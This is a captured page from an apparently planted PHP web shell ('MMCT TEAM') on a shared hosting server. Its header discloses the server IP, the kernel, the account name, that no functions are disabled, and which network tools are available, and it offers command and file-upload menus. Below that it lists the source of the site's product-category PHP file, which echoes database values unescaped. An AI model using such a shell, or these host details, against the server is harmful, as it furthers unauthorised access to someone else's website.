MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.16.135.226
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/naturewoodfloor.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/naturewoodfloor.in/our-categories.php
  <!-- Blog area -->
    <div class="section py-4">
        <div class="container">
            <div class="section-title text-center mb-lg-9 mb-md-7 mb-5">
                <h2 class="title">Our <span>Categories</span></h2>
                <p>Precision crafting, forging futures in metal and design innovation seamlessly. </p>
            </div>
            <div class="blog-active swiper">
                <div class="swiper-wrapper">
                    <?php
                        $sqltype = "SELECT * FROM `tbl_product`";
                        $runtype = mysqli_query($db,$sqltype) or die("Query Not run");
                        while($datatype = mysqli_fetch_assoc($runtype)){
                        $serviceUrl = $wspath ;
                        // if (isset($_REQUEST['loc_slug'])) {
                        //     $loc_slug = htmlspecialchars($_REQUEST['loc_slug']);
                        //     $serviceUrl .=  $loc_slug. '/';
                        // }
                    
                        $serviceUrl .= '' . $datatype['slug_link'] . '.html';
                    ?>
                    <div class="swiper-slide">
                        <div class="blog-wrap">
                            <div class="blog-img mb-2">
                                <a href="<?php echo $wspath?>service<?php echo $datatype['slug_link']?>.html">
                                    <img src="<?php echo $wspath?>admin/images/services/<?php echo $datatype['image'];?>" style="height:200px;" alt="<?php echo $datatype['product_name'];?>">
                                </a>
                            </div>
                            <div class="blog-content">
                                <!--<div class="blog-meta">-->
                                <!--    <ul>-->
                                        
                                <!--        <li><a href="#">Building </a></li>-->
                                <!--    </ul>-->
                                <!--</div>-->
                                <h3 style="padding:6px 0;"><a href="<?php echo $wspath?>service<?php echo $datatype['slug_link']?>.html"> <?php echo $datatype['product_name'];?></a></h3>
                            </div>
                        </div>
                    </div>
                    <?php } ?>
                </div>
            </div>
        </div>
    </div>

MMCT - 2023